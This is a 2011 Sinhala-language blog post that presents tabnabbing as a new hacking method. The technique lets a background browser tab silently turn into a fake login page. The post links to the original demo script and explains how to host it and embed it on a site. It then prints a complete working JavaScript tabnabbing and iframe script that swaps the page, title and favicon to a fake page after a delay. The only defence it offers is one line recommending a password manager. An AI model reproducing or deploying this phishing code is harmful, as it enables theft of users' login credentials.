Ads 468x60px

Sport News

Visitors

පහත ඇති "Like" Button එක ක්ලික් කර ඔබත් අදම අපේ Facebook Fan කෙනෙකු වන්න

Powered By Tricks Lanka

Comments

Wednesday, July 13, 2011

Tabnabbing - Phishing කලාවේ අලුත්ම පෙරලිය (*තවත් එක් හැකින් ක්‍රමයක්)

මෙකෙන් මුලිකවම කරන්නේ අපි web browser එක tab එකක් දාලා වෙබ් අඩවියකට ගියා කියමුකෝ , හිතන්න අපි ගිය වෙබ් අඩ්වියේ මෙම phishing එක සිදුවෙන script එකක් ඇතුලත් වෙනවා කියලා . දැන් අර මම open කරපු මුල්tab එක තියලා , තව tab කිහිපයක් උපයෝගි කරගෙන මගේ වැඩටික කරනවා . නමුත් මෙම වෙලාවේදි අර script එක ඇතුලත් වෙලා තිබ්බ වෙබ් අඩවිය වෙනත් වෙබ් අඩවියකට (හිතන්නකෝ බොරු yahoo , gmail , facebook login page එකකට කියලා) යනවා . නමුත් මම දන්නවා මම ඒ වෙලාවේ ඒ tab එක ඔපන් කරලා තිබ්බේ ඒක නිසා මම එහි URL එක බල බ්ල ඉන්නේ නෑ , කෙලින්ම මගේ අදාල විස්තර ටික ඇඳලා දානවා hah. එතකොට තමා අපිට කෙලවෙන්නේ . මට ඔය පැහැදිලි කිරිම් කරන්න හරි අමරුයි අප්පා , ඔයාලත පහත විඩියෝ දාලා බලන්නකෝ එතකොට තේරෙයි
A New Type of Phishing Attack from Aza Raskin on Vimeo.
garupale


දැන් තේරෙනවා නේද වැඩේ කොහොමද වෙන්නේ කියලා . මම source code එකත් බැලුවා , වැඩේ නම් සරල logic එකකට තමා වෙන්නේ . මට මෙතැන source code එක දාන්න බැ , virus guard වලින් අල්ලනවා virus කියලා , ඇත්ත කියුවොත් මේකේ විරුස් එකක් නෑ , වෙන්නේ අර ටැබ් ගොඩක් open වෙලා තියන වෙලාවට වෙබ් අඩ්විය වෙනස්වීම පමණි .මෙක හොයාගෙන තියන්නේ ඔය mac එක හොයාගත්ත මහත්තයාගේ පුතා (Aza Raskin) කියලා තමයි සඳහන් වෙන්නේ . ඔයාලත් එයාගේ බ්ලොග් එකට ගිහිල්ලා බලන්නකෝ .(http://www.azarask.in/blog/post/a-new-type-of-phishing-attack/ , ආ කියන්න අමතක වුනා මේ අඩ්වියට යන කොට මෙයා මේ බ්ලොග් එකේ script එක දාලා තියනවා අපිට demo එකක් වගේ පෙන්නන්න .ඒ වෙලාවට virus gurad එකෙන් අල්ලයි virus කියලා , ඒකට බයවෙන්න එපා හොඳේ !!).


ම්මත් මේ demo එකක් හැදුවා , ඒක ටිකකට කලින් delete කරලා ( free hosting නේ ) . ඔයාලට ඔයාලගේ වෙබ් අඩවියකට මෙය දාන්න ඕනෙම නම් කරන්න තියන්නේ මෙහි .js (javascript file එක) ඔයාලගේ web hosting service එකකට upoload කරලා , වෙබ් අඩ්වියේ <script>
tag එක මඟින් javascript එක කෝල් කිරිම පමනයි . garupale



script එක භාගත කරගන්න : http://bit.ly/da4qVT (http://www.azarask.in/projects/bgattack.js)

උදා : (දැනට මෙම script එක මෙහි නිර්මාතෘගේ වෙබ් අඩවියේ තියන නිසා මම මෙම script එක එහි සිට කොල් කරනවා) . පහත කේතය text file එකක දාලා " anyname.html" ලෙස save කරලා ඕක tab කිහිපයක් ඕපන් කරලා බලන්නකෝ . yoursite.com/phishing.javascript.js එක javascript එක තියන තැනට වෙනස් කරන්න . )

කේතය :


  1. <html><head> </head><body><h2> Testing tabnabbing </h2><script type="text/javascript" src="yoursite.com/phishing.javascript.js"></script> </body></html>  

තව ඕක ක්‍රමය වැඩිදියුණු කරලා , ඒ කියන්නේ tabnabbing සහ iframe භාවිතා කරලා ගේම දෙන විඩියෝ ඒකකුත් දැක්කා youtube එකේ .ඕං ඒකත පහත දාලා ඇති බලන්නකෝ , බලලා පහලින් කොමෙන්ට් එකක් දාලම යන්නකෝ !!


විඩියෝ භාවිතා වු කේතය (tabnabbing & iframe) :

  1. <html><head><title></title></head><style type="text/css">html {overflow: auto;}html, body, div, iframe {margin: 0px; padding: 0px; height: 100%; border: none;}iframe {display: block; width: 100%; border: none; overflow-y: auto; overflow-x: hidden;}</style><body> <script type="text/javascript">//----------Set Script Options--------------var REAL_PAGE_URL = "http://google.com/"; //This is the "Real" page that is shown when the user first views this pagevar REAL_PAGE_TITLE = "Google"; //This sets the title of the "Real Page"var FAKE_PAGE_URL = "http://www.hackyeah.com"; //Set this to the url of the fake pagevar FAKE_PAGE_TITLE = "HackYeah"; //This sets the title of the fake pagevar REAL_FAVICON = "http://www.google.com/favicon.ico"; //This sets the favicon.  It will not switch or clear the "Real" favicon in IE.var FAKE_FAVICON = "http://www.hackyeah.com/favicon.ico"; //Set's the fake favicon.var TIME_TO_SWITCH_IE = "4000"; //Time before switch in IE (after tab changes).var TIME_TO_SWITCH_OTHERS = "10000"; //Wait this long before switching (does not account for tab focus) .//---------------End Options-----------------var TIMER = null;var SWITCHED = "false"; //Find Browser Typevar BROWSER_TYPE = "";if(/MSIE (\d\.\d+);/.test(navigator.userAgent)){ BROWSER_TYPE = "Internet Explorer";}//Set REAL_PAGE_TITLEREAL_PAGE_TITLEdocument.title=REAL_PAGE_TITLE; //Set FAVICONif(REAL_FAVICON){ var link = document.createElement('link'); link.type = 'image/x-icon'link.rel = 'shortcut icon'link.href = REAL_FAVICON; document.getElementsByTagName('head')[0].appendChild(link);} //Create our iframe (tabnab)var el_tabnab = document.createElement("iframe");el_tabnab.id="tabnab";el_tabnab.name="tabnab";document.body.appendChild(el_tabnab);el_tabnab.setAttribute('src', REAL_PAGE_URL); //Focus on the iframe (just in case the user doesn't click on it)el_tabnab.focus(); //Wait to nab the tab!if(BROWSER_TYPE=="Internet Explorer"){ //The tested versions of IE blur the iframe on tab change el_tabnab.onblur = function(){ TIMER = setTimeout(TabNabIt, TIME_TO_SWITCH_IE); } el_tabnab.onfocusfunction(){ if(TIMER) clearTimeout(TIMER); }} else { setTimeout(TabNabIt, TIME_TO_SWITCH_OTHERS);} function TabNabIt(){ if(SWITCHED == "false"){ //Redirect the iframe to FAKE_PAGE_URL el_tabnab.src=FAKE_PAGE_URL; //Change title to FAKE_PAGE_TITLE and favicon to FAKE_PAGE_FAVICON if(FAKE_PAGE_TITLE) document.title = FAKE_PAGE_TITLE;  //Change the favicon -- This doesn't seem to work in IE if(BROWSER_TYPE != "Internet Explorer"){ var links = document.getElementsByTagName("head")[0].getElementsByTagName("link"); for (var i=0; i<links.length; i++) { var looplink = links[i]; if (looplink.type=="image/x-icon" && looplink.rel=="shortcut icon") { document.getElementsByTagName("head")[0].removeChild(looplink); } } var link = document.createElement("link"); link.type = "image/x-icon"link.rel = "shortcut icon"link.href = FAKE_FAVICON; document.getElementsByTagName("head")[0].appendChild(link); } }}</script> </body></html>  

මේකෙන් බේරෙන්න තියන හොදම ක්‍රමය තමා browser එකේ password manager එකක් දාගෙන භාවිතා කිරිම . ඔය Secure login (https://addons.mozilla.org/en-US/firefox/addon/4429/)වගේ හොඳයි .garupale

1 ප්‍රතිචර:

බැලුවද?

ඉතිං එහෙනම් කමෙන්ට එකක් දාලා යමු නෙද?